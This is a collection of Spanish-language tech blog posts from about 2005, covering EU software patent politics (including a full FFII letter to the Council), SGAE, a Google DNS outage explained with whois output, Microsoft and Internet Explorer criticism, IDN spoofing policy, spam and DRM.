Se trata de un wiki, una página de notas, programada en javascript. Modifica el propio documento html para guardar los cambios que realizamos, y así podemos llevar en una memoria USB todo nuestro TODO en una página web multiplataforma.

No es sólo la ya de por sí complicada tarea de modificar el documento con DOM, entender la sintaxis wiki, crear formularios y todo eso, sino la cuidada interfaz, que incluye hasta efectos para cambiar entre notas abrir o cerrarlas, etc. Increíble.

Parece que el Parlamento Europeo no va a aceptar la chapuza que dejó pasar el Consejo de la Unión Europea, que aprobó el borrador de la ley de patentes de forma bastante irregular e ignorando la petición del JURI (Comisión de Asuntos Jurídicos del Parlamento Europeo) de reiniciar el proceso de redacción y discusión de la ley por la gran cantidad de controversia y dudas respecto al borrador actual.

Ahora el JURI está consultando con expertos para redactar enmiendas a la ley, y parece que en ellas se incluirá una definición de patente aceptable mucho más favorable a nuestros intereses: El software puro, algoritmos, ideas, protocolos de comunicación, encriptación, y en general cualquier método de procesado, almacenamiento y presentación de la información NO serían patentables.

Sólo podría patentarse como software la parte de algoritmos y programación de aquellos inventos que sean tangibles y físicos, como el sistema de frenado de un coche. La burrada que dejó pasar el consejo era aceptar patentes de toda invención que supusiese una “contribución técnica", y que me cuelguen si no se puede colar casi cualquier cosa con ese nombre.

Todo el mundo sabe que se puede encontrar analogías entre todo. Incluso a cosas tan dispares como el tocino y la velocidad, podremos decir que la velocidad de caída de la leche que te pegas si resbalas con un trozo de tocino grasiento en el suelo.

Pero claro, si pretendes hablar en serio tienes que buscar comparaciones más acertadas, no manipuladoras ni estúpidas. La SGAE parece que sigue a lo suyo. Leo en los Locos Desquiciados que se hacen llamar Libertad Digital:

Pedro Farré, abogado de la SGAE, ha propuesto que, al igual que se requiere una licencia para poder conducir, se necesite una identificación especial para navegar por la Red. El objetivo, expresó Farré durante la IV Jornada de Periodismo Digital, consiste en erradicar el anonimato de Internet.

¿Ein? Me he debido perder algo, por que no veo la relación entre anonimato y el carnet de conducir. El carnet por supuesto te identifica, y si cometes una infracción te multan. Pero que yo sepa no paso el carnet por un lector en la carretera para perder mi anonimato, y que la DGT sepa que voy a matalascañas.

Que yo sepa si cometes una infracción de la ley en Internet, como distribuir pedofilia, la policía puede (debe) investigar, obtener pruebas, pedir los datos a tu proveedor y localizarte. Igual que pasa en la vida real. Lo que la SGAE pretende es que se sepa quién es el que hace cada cosa en Internet, y eso señores es como pretender que la gente instale un GPS en su coche para saber en todo momento qué hace, a dónde va y que parajes visita.

Algunas de las perlas que ha soltado el bestia del abogado de la SGAE, para justificarse ante algunos comentarios que le hacían notar que eso equivaldría a proibir el anonimato en la vida civil, son: “internet no es un mundo regulado” y que “no cabe la libertad sin responsabilidad".

Ya lo sabe medio mundo, pero no me puedo resistir a comentarlo. La web de Google y muchos de sus otros servicios aparecía substituida por otras webs, en función de desde donde se estuviera solicitando la página.

Lo más gracioso de todo es el total desconocimiento de los medios de prensa –para variar–. Ni google ha sido hackeada ni parece que haya habido nadie malintencionado detrás de esto, sólo un conjunto de incidencias.

Primero muchos piensan en que esto es parte del “hackeo":

$ whois google.com
Whois Server Version 1.3
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Server Name: GOOGLE.COM.SUCKS.FIND.CRACKZ.WITH.SEARCH.GULLI.COM
IP Address: 80.190.192.24
Registrar: KEY-SYSTEMS GMBH
Whois Server: whois.rrpproxy.net
Referral URL: http://www.key-systems.net
Server Name: GOOGLE.COM.HAS.LESS.FREE.PORN.IN.ITS.SEARCH.ENGINE.THAN.SECZY.COM
IP Address: 209.187.114.130
Registrar: INNERWISE, INC. D/B/A ITSYOURDOMAIN.COM
Whois Server: whois.itsyourdomain.com
Referral URL: http://www.itsyourdomain.com

En el whois aparecen todos los nombres de servidores dns que quiera tener cada cual, y si tu quieres poner a tu servidor de nombre en vez del típico “ns1.midominio.com", “microsoft.com.sucks.midominio.com", pues puede, y se verá en el whois al buscar microsoft.com.

Ahora mismo se pueden ver para microsoft las siguientes entradas (y casi cualquier empresa grande tendrá cosas parecidas):

MICROSOFT.COM.WAREZ.AT.TOPLIST.GULLI.COM
MICROSOFT.COM.WANADOODOO.COM
MICROSOFT.COM.SUX.BUT.PYROFREAK.ORG.RULEZ.AND.DIOXYTECH.NET.DELETED.GANDI.NET
MICROSOFT.COM.SMELLS.SIMPLECODES.COM
MICROSOFT.COM.SHOULD.GIVE.UP.BECAUSE.LINUXISGOD.COM
MICROSOFT.COM.RAWKZ.MUH.WERLD.MENTALFLOSS.CA
MICROSOFT.COM.OHMYGODITBURNS.COM
MICROSOFT.COM.LIVES.AT.SHAUNEWING.COM
MICROSOFT.COM.IS.NOT.AS.COOL.AS.SIMPLECODES.COM
MICROSOFT.COM.IS.IN.BED.WITH.CURTYV.COM
MICROSOFT.COM.IS.GOD.BECOUSE.UNIXSUCKS.COM
MICROSOFT.COM.IS.A.STEAMING.HEAP.OF.FUCKING-BULLSHIT.NET
MICROSOFT.COM.HAS.ITS.OWN.CRACKLAB.COM
MICROSOFT.COM.HAS.A.PRESENT.COMING.FROM.HUGHESMISSILES.COM
MICROSOFT.COM.FLINGS.POO.AT.MONKEYCORE.COM
MICROSOFT.COM.FILLS.ME.WITH.BELLIGERENCE.NET
MICROSOFT.COM.CAN.GO.FUCK.ITSELF.AT.SECZY.COM
MICROSOFT.COM.ARE.GODDAMN.PIGFUCKERS.NET.NS-NOT-IN-SERVICE.COM
MICROSOFT.COM.AND.MINDSUCK.BOTH.SUCK.HUGE.ONES.AT.EXEGETE.NET

Y finalmente el motivo de que la página de google apareciera substituida por otra no es más que las pruebas que hacen los navegadores cuando no encuentran un dominio. www.google.com no tenía ninguna entrada en el DNS por algún problema técnico, y los navegadores prueban a buscar www.google.com.com, luego www.google.com.net. Y voila!!! El dominio “com.net” está registrado, y www.google.com.net acaba mostrando la dichosa página de búsqueda de So Go Search.

Si a veces los navegadores no se empeñaran en hacernos las cosas fáciles y tomar decisiones por ellos mismos, simplemente se habría visto como un pequeño intervalo con Google caído.

Concido con Todd Berman en que hay logos diseñados por personas o muy poco avispadas o con claros problemas psicológicos… ¿O será que somos nosotros los que tenemos una mente desviada?.

¿A vosotros que os parece este logo?

Al final Jorge Cortell dió su conferencia como anticipábamos ayer, demostrando que realmente no es ilegal la descarga de música y otro material protegido desde las redes P2P. Tenemos derecho a la copia privada y podemos ejercerlo, por mucho que se empeñe la SGAE en que creamos lo contrario.

Jorge Cortell relata en su blog el desarrollo de la conferencia, (incluyendo las excepcionales medidas de seguridad de la Universidad, la ausencia de periodístas que iban a cubrir el evento, etc). Además despues resume los rumores que ha recibido, que ponen los pelos de punta, que básicamente se resumen en que por venganza no le van a dejar continuar de profesor y le intentarán hundir de forma personal.

Así funciona España, puro mamoneo y trapicheo, tu trabajo no depende tanto de tu rendimiento como de los enchufes que tengas y de como caigas, y donde hay dinero todo vale. Lo peor de todo es que esto ocurre dentro de una Universidad, que debería ser el parangón de la libertad, pero que parece que ahora se vende a la economía de mercado. Ains…

Ha aparecido ya en muchos sitios, pero es que es genial la historia esta de un supuesto hacker, más bien un lammer noob script kiddie, que no tiene ni idea y se borra el disco duro pensando que atacaba a otra persona.

Nos hemos encontrado tantas veces con este tipo de gente por el irc y similares… y son un reflejo de la vida real, esas personas que viven de la apariencia, queriendo saber más que el resto por el puesto o por flipado, sin tener ni luego idea, pero que necesitan destacar y al final acaban dando vergüenza ajena por el tamaño de las cagadas que cometen.

Las 480 toneladas (serán 600 en la versión comercial) han despegado y volado alegremente. Parece mentira que el aire pasando bajo las alas a 260 Km/h logre levantar semejante peso y semejante bicharraco.

Lo que darían algunas personas por levantarse de la tumba para verlo.

Los últimos tests que han pasado por Planeta Eurielec:

Me asusta mi nivel nerd…

¡El 27 de abril de 2005, todos, con la Universidad, contra las patentes de software en la UE!

Ayer tocó limpieza en “el garito“, el local de nuestro club, Eurielec. Estaba desordenadísimo, lleno de mierda, y abarrotado de cajas y desperdicios varios, en parte por el congreso que organizamos recientemente.

Lo que más me fastidia de estas limpiezas es cuando se empieza a “tirar todo". Yo he sido desde enano de lo más urraca, arramplando con todo tipo de cachivaches y archiperres encontrados por la calle, por si algún día pudieran ser útiles y servir para algo (así tengo mi cuarto como lo tengo, jejeje). Entiendo que el espacio es cuantitativo y limitado, pero hay cosas que no se pueden (deben) tirar así como así.

Por ejemplo los ejemplares de la revista Investigación y Ciencia, algunos de los cuales datan del 78, con anuncios de ordenadores como el Apple II y otras cosas que ahora nos parecen prehistóricas, y artículos sobre avances que ahora nos hacen bostezar. Como siempre digo, vale que ahora nadie se ponga a leerlos si están en el club, pero las piezas de los museos actuales están donde están por que alguien decidió guardarlas a pesar del espacio que consumían o de parecer carentes de interés en un primer momento.

Al menos me alegro de que algún ejemplar acabe en buenas manos. Si te interesa alguna de estas revistas, creo que aún siguen en una mesa a la entrada de Eurielec, para quien quiera acogerlas :).

Coincidiendo (casualidad) con la última fase del lanzamiento del Mac OS X “Tiger", que dicen tiene más de 200 mejoras (algunas un tanto normalillas), MS anuncia a bombo y platillo las nuevas características de su vaporware Windows Longhorn.

De leerme el artículo se puede extraer lo siguiente, MS empaquetará “nada” en cajas azulitas… por que vamos, cosas novedosas no tiene nada de nada… Más seguridad, muchos efectos en las ventanitas (que dudo que mejore el rendimiento a la hora de trabajar), iconos que presentan el contenido del archivo (me suena) y mejor búsqueda de documentos (¿de verdad la gente usará esto tanto?, ¿clasificará bien y aportará información a los archivos para que luego se puedan buscar de verdad?).

Aparte que novedades hay más bien pocas… Linux ha sido de los primeros en tener un sistema de búsqueda instantánea e inteligente, también lo tiene Mac OS X, etc…

Hice por curiosidad (y aburrimiento) el test que puso Gatafunho en su blog y en mi caso, para el que me conozca, tampoco hay sorpresas…

You scored as atheism. You are… an atheist, though you probably already knew this. Also, you probably have several people praying daily for your soul. Instead of simply being “nonreligious,” atheists strongly believe in the lack of existence of a higher being, or God. atheism 92% Paganism 67% Satanism 63% agnosticism 58% Buddhism 50% Islam 38% Judaism 29% Christianity 29% Hinduism 0%

¿Quieres probar tu también? Which religion is the right one for you?

Chema ha tardado en darse cuenta (o en comentarlo en su blog :P), Gmail crece, poco a poco, pero contínuamente, y ya ofrece 2100 megabytes de espacio.

Se incrementó a 2 Gbytes por el primer aniversario del servicio, y seguirá creciendo. En cuanto al rumor al que se refiere, no es otra cosa que la broma del día de los inocentes, que en América cae por abril. Podéis ver cómo se veía la página de Gmail con la broma ese día. :)

Hoy la Unión Europea ha rechazado la licencia propuesta por Microsoft para asegurar la interoperatividad y tener acceso a la documentación de sus protocolos.

Hace ya tiempo la UE decidió multar a Microsoft por prácticas monopolísticas. Entre algunas de las condiciones impuestas, además de vender el Media Player como producto separado, para no hundir a Real Networks, le exigió que hiciera públicos los protocolos de comunicación de Windows, a fin de que el resto de productos puedan competir y ser compatibles con Microsoft.

Hasta ahora MS se estaba saliendo con la suya, por que la exigencia de vender por separado el Media Player se la ha saltado a la torera, sacando simplemente dos versiones de Windows, una sin Media Player, y otra con. Y claro, con nombres lo suficientemente sugerentes como para que nadie se compre la versión “sin".

Ahora proponía una licencia para interoperatividad totalmente incompatible con la GPL, y que exigía pagar unos royalties exagerados: Un precio por copia, y permitía el desarrollo de herramientas sin acceso al código fuente. Si leías algo de la documentación de Microsoft sobre sus protocolos, ya no podías desarrollar nada sin tener que pagar royalties y estar sujeto a compromisos.

Microsoft, si no rectifica, podría ser multada con sumas de 5 millones de dólares al día. Nos puede parecer una monstruosidad, pero Microsoft gana –factura mucho más– 100 millones al día. Eso sí, me parece que antes de perder el %5 de sus beneficios, atenderá seriamente las peticiones de la Unión Europea.

Ahora parece que Linux es inseguro y no escala XDDDD… Google usa linux, hay máquinas con Linux de Silicon graphics con 256 procesadores, más de la mitad de los 500 superordenador más rápidos usan linux… Que equivocados deben estar los pobres…

Los desarrolladores del navegador Opera retan a M$ para que saque un Explorer 7 que cumpla los estándares, proponiendo un nuevo Acid Test 2 que pruebe todos los detalles y estándares que necesitan los desarrolladores web. Desde luego como el IE7 sólo tenga las novedades que anuncian, mal vamos.

Y finalmente, un script para crear digitalmente las paredes inundadas de fotos típicas de tantos cuartos… No se yo que es más práctico, si revelar 100 fotos pequeñas o imprimir un A2 con todas tus fotos.

Ahora parece que Linux es inseguro y no escala… Google usa linux, hay máquinas con Linux de Silicon graphics con 256 procesadores, más de la mitad de los 500 superordenador más rápidos usan linux… Que equivocados deben estar los pobres…

Los desarrolladores del navegador Opera retan a M$ para que saque un Explorer 7 que cumpla los estándares, proponiendo un nuevo Acid Test 2 que pruebe todos los detalles y estándares que necesitan los desarrolladores web. Desde luego como el IE7 sólo tenga las novedades que anuncian, mal vamos.

Y finalmente, un script para crear digitalmente las paredes inundadas de fotos típicas de tantos cuartos… No se yo que es más práctico, si revelar 100 fotos pequeñas o imprimir un A2 con todas tus fotos.

Es un email del FFII un poco largo, pero su contenido plantea tales dudas sobre el funcionamiento democrático del consejo europeo, que merece la pena leerlo y tomarse unos minutos para entenderlo. Ahora esperemos las respuestas del consejo.

To: public.info@consilium.eu.int
Subject: What happened on March 7th regarding Software Patents ?
Date: Tue, 15 Mar 2005 15:36:45 +0100 (CET)

Dear Council Presidency,

On Monday, 7 March 2005, the Council claimed to have reached a Common Position on the controversial software patents directive. Several national Parliaments had given orders to their governments to oppose the draft text that was on table. Additionally, many governments were not happy with that text, so they attached a unilateral declaration to the reached agreement. Some governments even asked to reopen discussions. Finally, from the publicly available audio and video data, it seems as if the vote on the software patents A item simply never took place.

We would therefore like to receive answers to the following questions:

Q1: Was the agenda sent to the other members of the Council within 14 days before the meeting (article 3(1))?

Q2: In case the software patents A item was not put on the agenda at least 14 days in advance of the Council meeting, did not a single member state ask for it to be removed from the list of A items?

Q3: When did the presidency send a note regarding its inclusion on the agenda? When did other Council members receive it?

Q4: (a) Did Bulgaria and Romania receive the required 7 days to have a look on this important directive? (b) If, as we are told, this was not the case, what reasons of urgency caused the Council Presidency to shorten their period? © Did those countries agreed to shorten this period?

Q5: The European Affairs Committee of the Danish Parliament obliged the Danish minister to request a B item according to article 3(8). The Council Presidency in its initial speech mentions that Denmark, alongside with Poland and Portugal, indeed asked for a B-Item, but that their request was inadmissible. Is it therefore correct to assume that Denmark requested a B-Item, as called for by its Parliament?

Q6: Does requesting a B item not automatically imply a request to remove the A item?

Q7: Article 3(8) of the Council’s Rules of Procedure states that ‘if a position on an “A” item might lead to further discussion thereof’, the A item must be removed from the agenda. Is the fact that three member states wanted to reopen the discussions not an indication that certain positions “might” lead to further discussions? If not, can you give an example of something which would fulfill the conditions set out in this rule?

Q8: Only “the Council” can decide that a request to remove an A item or to turn it into a B items is inadmissible. Who was “the Council” in this case?

Q9: In case an actual vote is held about this, what kind of majority rules are used?

Q10: If this vote were initiated, what question would the Council members have been asked to vote on?

Q11: The Council Presidency referred to itself as “the Council” in relation to rejecting the Danish B item request. (a) Does the Presidency want to imply that the reference to “the Council” in Article 3 of the Rules of Procedure is a reference to the Presidency, i.e. that the Presidency alone can decline a B item requests? (b) If so, based on which rule?

Q12: With regard to reopening the discussions, the Presidency stated it could not reopen discussions because “there are procedures which have to be respected". (a) Can you point out which procedures state that a political agreement cannot be discussed again? (b) If there is no such rule, how can this statement be justified?

Q13: (a) If the Presidency alone cannot deny a B item request, how did a majority of the Council vote against removing the item from the agenda? (b) Article 8(1)(b) states that the outcome of voting must be “indicated by visual means", but no such indication was seen on the public video. Did we miss it, or was no vote called? © If no vote was called, how does this fit in the Council’s Rules of Procedure?

Q14: At the end of the session, the Presidency asked whether everyone agreed on the “other” A items. Does this mean the software patents A item was already voted on before? If so, when did this happen?

Q15: Certain parts of the session were not public, e.g. the speech by Minister Brinkhorst. Why? In the recording of the English simultaneous translation, we can hear “Switch me off!” asked by a Council Member. Is it compliant with the Council’s Rules of Procedure to switch off a microphone so that the public cannot hear what is said in a public deliberation?

Q16: Can the Common Position be sent to the European Parliament and be presented there before the minutes are signed?

Q17: What happens if a member state does not sign the minutes?

Q18: Belgium and France attached unilateral declarations to the text on which a political agreement was reached in May, which is substantially the same text as on the Monday agenda. Why were those declarations not mentioned on Monday, and why have those declarations not been sent to the European Parliament?

Q19: How many directives in the history of the Council had more unilateral statements attached to the formal approval of the Council in first reading than this one?

Q20: Minister Verwilghen declared in the Belgian Parliament that no country asked for a B item. (a) Can you explain why the Presidency mentions the request from those 3 countries in his speech if nobody asked? (b) If those countries have really asked the presidency in private or informally, does this not go against the principle that this was a “public deliberation"? © How much of the “public deliberation” was not public, and at which point does it become a non-public deliberation with a short public overview of the end result? (d) Does this not go against at least the spirit of the Council’s Rules of Procedure?

Q21: The Rules of Procedure clearly state that a removal of an A item from the agenda, or changing it back into a B item, can be denied by “the Council". This means that so long as the Council makes sure it does not incite motions from 4 Parliaments and declarations of
concerns from 9 member states (7 last Monday, 2 in May 2004) regarding its political agreement text, there is little chance of a request like that coming up and actually surviving a vote. As such, how can the Council Presidency justify denying the B item request based on
“institutional reasons” and for fear of creating a precedent which will potentially delay all future Council work?

Q22: Are full minutes made of the Council meeting? If so, in which formats (audio, steno, …), and is it possible for the public to get access to that part of the minutes which corresponds to the public deliberations?

Q23: How can a delegate express his wish to speak in an urgent matter, even when it’s not his turn, for example to react to a surprising developement in the course of proceedings where he wouldn’t be asked again normally ? Are there conditions when a delegate can not speak even if he wants to do so? Can the Presidency or anyone else turn off a delegates microphone, or interrupt the recording and publi ? Under what conditions would a delegate be allowed to do speak anyway to the Council in such cases ?

Even if all interpretations of the Rules were done with the best intentions, possibly even in our interest without us understanding how, we hope you can see that this kind of creative rule interpretation does not encourage faith in the democratic functioning of the Council. It seems as if the whole Council meeting was just a rehearsed performance, that most of the “public deliberations” did not occur publicly at all and that even worse precedents have been set than those the Council was afraid of:

• The Council seems to put the speed with which legislation enters into force above quality, even though it recognises the enormous importance of this legislation.
• The Council implied that a political agreement is always final due to “institutional reasons". Nevertheless, national Parliaments can only review the final text subject of a political agreement after said agreement has been reached, since this text can still be changed at the meeting where the agreement is reached (as happened in May 2004). As such, they will never be able to decide whether they want to accept a Common Position adopted by the Council.

We are not sending all these procedural questions to you because we do not like the text which came out of the Council’s first reading. We are sad because of the democratic deficit surrounding the decision. We would much rather have seen an even worse text coming from the Council (in so far this is possible) with full democratic support, than a text which clearly forbids software patents using Monday’s procedures. This is not about software patents, it is about respect for the foundations of European Democracy.

Sincerely yours,

The Board of FFII
(Hartmut Pilch, Gérald Sédrati-Dinet, Laura Creighton, Jonas Maebe, Jan Macek, Holger Blasum, Alex Macfie)

Hace poco se iniciaba un Google Bomb que yo apoyé consistente en enlazar a la Wikipedia usando los términos Online Poker, con el objetivo que esa página salga la primera en las búsquedas en Google de esos términos, en vez de las de los odiosos spamers.

Pues bién, parece que la cosa marcha, y la Wikipedia ¡ya aparece tercera en Google!.

Hoy he visto una técnica impresionante para colorear fotos con apenas unos trazos para indicar el color de regiones enteras, en unos segundos, en vez del tedio de ir ajustando máscaras al milímetro, una tarea que puede llevar horas.

La técnica también funciona para cambiar el color de objetos de fotos a color, e incluso para colorear videos marcando unos pocos frames de referencia con unos cuantos trazos de color. ¡Consigues el video entero con unos colores y calidad impresionantes!. ¡En unos minutos! Sólo puedo pensar en los pobres que coloreaban las películas de Hollywood, que si ven esto se abren las venas.

Tienen el código Matlab del algoritmo empleado. A ver si alguien se curra rápido un plugin para el Gimp.

Así se pinta ahora mismo el color esperanza en la UE (en adelante República Bananera). De negro. El peligro de las patentes de software se cierne sobre el Software Libre y la pequeña industria mientras los grandes monopolios se frotan las manos con la boca ensalivada por el olor del negocio fresco, todo por un puñado de dólares para comprar a unos cuantos políticos.

Algunas webs como Planet Gnome ya se han empezado a teñir de forma acorde a cómo se ve el futuro del desarrollo de software en la UE:

Al final los poderosos impulsores de las patentes se han salido con la suya, y ha pasado el Consejo de la Unión Europea aprobado como elemento A de la agenda (sin modificaciones, discusión o votación).

Ahora pasará de nuevo al Parlamento Europeo, para segunda lectura, donde se podrá rechazar o modificar la propuesta de nuevo (aunque cada vez con menos posibilidades de discusión).

Ya van varias veces que el Parlamento rechazaba la propuesta y solicitaba al Consejo que se reiniciara el proceso de elaboración de la ley, pero al final el consejo vuelve a presentar la propuesta sin cambios ni reiniciar el proceso: “We are adopting the position for institutional reasons so as not to create a precedent which might have a consequence of creating future delays in other processes", es decir, que aprueban la propuesta no por su contenido sino por que se está retrasando mucho… manda narices… ¡¡¡Si se retrasa su tramitación es por que sus impulsores se empeñan en volver a presentarla una y otra vez sin las modificaciones que se piden!!!

Para que nos hagamos una idea de lo mal que huele el asunto, no hay más que ver el informe esquemático del desarrollo de la reunión de manos de FFII:

Report

• Cyprus submitted a written declaration at the start of the Council session.
• Poland, Denmark, Portugal and others (not specified) asked for a B item (discussion point).
• The Luxembourg presidency claimed this was not possible due to procedural reasons, and that this would have undermined the whole process -> it would stay on the list of A-items.
• Luxembourg then gave a long statement regarding how the EP still gets a chance in second reading, the importance of avoiding legal uncertainty etc.
• Denmark said it was disappointed about this, but accepted and submitted a written declaration.
• Later on, the list of A items was accepted by the Council.

Conclusion

• Luxembourg negated the Council’s own Rules of Procedure, which state that a B-item (which is at the same time a request to remove an A item) can only be rejected by the a majority of the Council, and not just by the Presidency. (art 3.8).
• The objecting countries “forgot” to request removal of the A-item from the agenda. Rules 3.1 + 3.7 would have given any single country the right to have the A-item removed, because the Luxemburg presidency had failed to insert it more than 14 days earlier. It is difficult to believe that they were not aware of this possibility.
• This is a very sad day for democracy, and casts a very dark shadow over the European Constitution, which will give the Council even more power.

—Noticia completa del FFII.

Con esto nos encontramos en una situación peligrosísima. En otras ocasiones el Parlamento ha rechazado la propuesta, pero los síntomas de cansancio podrían volver a jugar una mala pasada, y si se acepta pasaría a ser una ley Europea en rigor.

A ver si hay suerte…

Si nunca te ha quedado claro qué entidades rigen qué partes de internet, ya tienes una pequeña guía que aclara el galimatías de acrónimos: ISOC, IETF, IESG, IRTF, IRSG, IAB, RFC Editor, ICANN, IANA y W3C.

Y como la cosa va de explicaciones, un artículo que se adentra un poco en el funcionamiento interno de Google. Qué interesante… como me molaría trabajar por allí…

Me ha encantado la idea de Gonzalo para fastidiar un poquitillo a los spammers de blogs, así que aquí va mi contribución. Odio el Online poker y a todos los spammers que llenan de “texas holdem” los blogs de la gente.

Entre eso, las imágenes con código para poder hacer comentarios, otros sistemas de filtros, y que ya muchos blogs añaden rel="external” a los enlaces de comentarios y trackbacks (y Google y otros buscadores ignoran esos enlaces para los cálculos de importancia), puede que nos libremos de esta molesta plaga en unos meses.

Si, ha llegado el momento, dejo Linux y me paso al maravilloso mundo de Windows.

¿El motivo? su rapidez, seguridad, fiabilidad… pero sobre todo, el soporte que proporciona. Ahora Microsoft parece que te compensará económicamente si un bug de su software anti-spyware te hace perder datos. ¿Algún otro sistema operativo ofrece eso?

En el end-user license agreement (EULA) parece que pone:

Microsoft will reimburse direct damages up to $5 for problems associated with the new downloadable tool that wards off spyware, adware and any other “potentially unwanted software.”

Waaoooooooooooo… ¡Hasta 5 US$!. ¡Increible!. Me pregunto en qué situaciones se llegará a la exorbitante cantidad de 5 dólares, ¿quién tiene datos tan importantes como para llegar a esa cifra? además tienen que ser daños directos “You can recover from Microsoft and its suppliers your direct damages up to U.S. $5.” pero “you cannot recover any consequential damages, lost profits, special, indirect or incidental damages from Microsoft".

Bueno… al menos tras esta noticia ya sabemos en cuanto valora MS nuestros ficheros. Ahora faltaría ver en cuanto valora nuestro tiempo. A lo mejor en un futuro MS también nos paga 5 dólares por cada vez que tengamos que reinstalar un mierda de windows estropeado, y te pasas un día entero instalando todo, improductivo y perdiendo el tiempo.

¿Tu en cuanto valoras tus ficheros y tu tiempo? Yo creo que mis datos “algo” más de 5$ sí que valen…

La DRM es la Digital Rights Management, es decir, todo lo relacionado con la protección y gestión de los derechos de autor y el copyright en medios digitales.

La ley que defiente más fuertemente el DRM es la Digital Millennium Copyright Act, que es tremendamente restrictiva comparada con los derechos a los que estamos acostumbrados en Europa. No hay más que ver esta comparación donde analiza las penas por robar un DVD en una tienda (mínimo de 0$, y máximo de 100.000$ y 1 año de prisión) y por bajarte el mismo contenido (mínimo de $4.400 y un máximo de 3.400.000$ + gastos de abogados + 1 año de prisión).

Para demostrar los estúpido de la ley de copyright un loco un poco atrevido ha decidido copiar 1 minuto y 3 segundos de una canción de la web de música iTunes, pero seleccionando una parte de silencio y el transgresor de la ley para más inri lo ha colocado en su web para su descarga, violando múltiples leyes de Copyright, y pudiendo enfrentarse a multas muy severas. Ahora queda preguntarse es culpable (lo es, ¿no? se ha bajado un fragmento de canción con copyright y la está distribuyendo), será por que ese fragmento tiene copyright, pero entonces ¿cualquiera que ponga en su web 1 minuto y 3 segundos de silencio en mp3 sería igualmente transgresor de la ley? Una nueva prueba más de lo estúpido de la ley de copyright, especialmente en medios digitales.

Yo lo flipo. Esto ya pasa de castaño oscuro. Los desgraciados de los spammers ya no sáben que hacer para saltarse los filtros. Cómo hostias un filtro de spam aprenderá a filtrar algo como ésto:

Me cago en ese 0,000001% de la gente que es estúpida, les compra, y hace que les merezca la pena seguir jodiendo al prójimo.

Por fin vuelve a estar operativo el servicio Mailpush de mi amigo Alex, que llevaba caído desde el hackeo del servidor.

Yo ya pensaba que se había olvidado del mail que le mandé pidiéndole que volviera a poner este indispensable servicio para recibir en tu email las tiras cómidas del día. :) Pero al final parece que ya ha vuelto del infierno y más allá (a juzgar por el de tiempo que llevaba sin leer el correo) y ya lo tiene de nuevo funcionando. ¡Gracias Alex!

De pura risa. He encontrado una página de M$ para educar a los padres que temen el lenguaje 1337 h4x0r de sus hijos, y no he podido parar de reirme.

Empieza con “While it’s important to respect your children’s privacy, understanding what your teenager’s online slang means and how to decipher it is important as you help guide their online experience".

No se por qué me da que si es un flipaillo de los que necesitan usar ese lenguaje, no va a necesitar que le “guíen en su experiencia online". Más bien al contrario, y el crío en cuestión, aprendiz de n00b 14mm3r, podría dar más de una clase a los papis desfasaos, que se pierden en el menú de inicio del windows y con el manual de uso del mando a distancia.

En fin, un manual único para enseñar a tus padres el lenguaje de la 31|73. XDDD

Uf, ya está aquí la nueva versión de wordpress, la 1.5, la estupenda aplicación para blogs programada en PHP, con muchas mejoras y correcciones por lo que he visto.

Ahora me tocará (a ver cuando saco tiempo) el actualizar el lío de versión que tengo ahora, que es una de CVS parcheadísima. Otros como Chema puede que incluso lo tengan peor que yo, que usan la versión 1.3 con infinitos (o más) cambios y modificaciones.

Al menos parece que en la nueva versión ya se cuida mucho el tema de plantillas, páginas extra, etc, para que no se necesite retocar nada a mano, y las actualizaciones siguientes sean más sencillas. Ya veremos…

Si, parece que vamos a tener en breve una nueva versión de nuestro querido IE (cariñosamente Inmenso Excremento). Y parece también que será aún más Inmenso, y aún más Excremento.

¿Cuales serán las mejoras? Seguridad, seguridad, seguridad… Lo malo es que me temo que sé que tipo de seguridad es. No la de un programa bien hecho, sino molestias para el usuario y el desarrollador, que verán como muchas cosas dejan de funcionar, como cuando se les ocurrió probar el “Shit Pack 2″ (SP2).

Y… ¡oh sorpresa! La palabra estándares no aparece ni una sola vez en todo el artículo.

Encima dicen que escuchan a sus clientes, analistas y partners y les dicen: “Yes, XP SP2 makes the situation better. We want more, sooner. We want security on top of the compatibility and extensibility IE gives us, and we want it on XP. Microsoft, show us your commitment“… Ohhh siii… MS… dame más… siiiii… Me parece que se han equivocado de canal, por que los desarrolladores nos cagamos en la mal entendida seguridad de Explorer y en su pésimo, deplorable, lamentable, vomitivo, asqueroso, y horrible soporte de los estándares.

Leo compungido cómo Mozilla desactiva los IDN por defecto para hacer frente a los ataques de IDN.

Me parece muchísimo más correcta la opción que yo sostenía y que coincide con la de Opera:

Date: Thu, 20 Jan 2005 18:06:30 +0100
From: bug-161715-s10@bugs.opera.com
To: ericjATshmoo.com
Subject: Your bug report
 
Hello Eric,
 
What you illustrate is an inherent problem with IDNA and the international Unicode characterset. On many systems success may depend on which fonts and languages the user have installed (and what is included in the default installation)
 
There was a discussion about a similar issue in our forums a couple of days ago:
 
[ URL: http://groups.google.com/groups?threadm=tmg […] ]
 
Unfortunately, I do not believe your suggestion of warning the user about IDNA encoded names in the name of secure servers is particable. It might look that way when you are dealing with spoofsites such as your example, but it would be maddening for Chinese and Japanese websurfers, in fact it would also irritate many European (e.g. French, German and Scandinavian) surfers who are using languages with characters that will generate punycode servernames.
 
The problem about spoofing websites using IDNA is IMO best solved by the domainname registrars, by limiting on their side the character-combinations they want to accept in a domainname. AFAIK such limitations are implemented in (e.g.) the Norwegian zone, but Verisign has not yet implemented something similar, which is understandable given the worldwide use of .com domains.
 
Please note that Wand or cookies will not be tricked by this kind of servernames.

Al menos parece que también la Fundación Mozilla ve esto como una solución temporal, y mantiene que “the problem is mostly the fault of domain name registries and registrars that let people register homographic variants of existing domain names (the ICANN guidelines specifically warn against this)“.

Estaría bien que, ya que existen, las empresas del mundo de internet hicieran caso a los organismos que la dirigen. Los desarrolladores al W3C y los registradores al ICANN.

Su negocio se acaba, ¿cuando lo admitirán de una vez?

Igual que los aguadores perdieron su negocio y nos parecería ridículo a estas alturas pagarles un cánon por el uso de los grifos. Igual que los que arreglan pinchazos no demandan a las empresas que crean líquidos que los evitan. Igual que los distribuidores de carbón no piden un canon por las calderas de gas. Igual que infinidad de negocios y oficios que han desaparecido fruto de la innovación tecnológica. A las discográficas se les acaba el chollo.

Ahora ya es posible ganar un Grammy sin discográfica, sin editar discos, y sin perder dinero.

Dicen que el futuro windows “cuerno largo” será una pasada, con una interfaz estupenda, donde las ventanas podrán dar vueltas y saltar como cabras locas. Yo me pregunto en qué narices puede ayudar eso al usuario a hacer su trabajo, que es lo que debe facilitar un ordenador.

¿Y tiene algo de innovador? ¿No parece más de lo mismo?

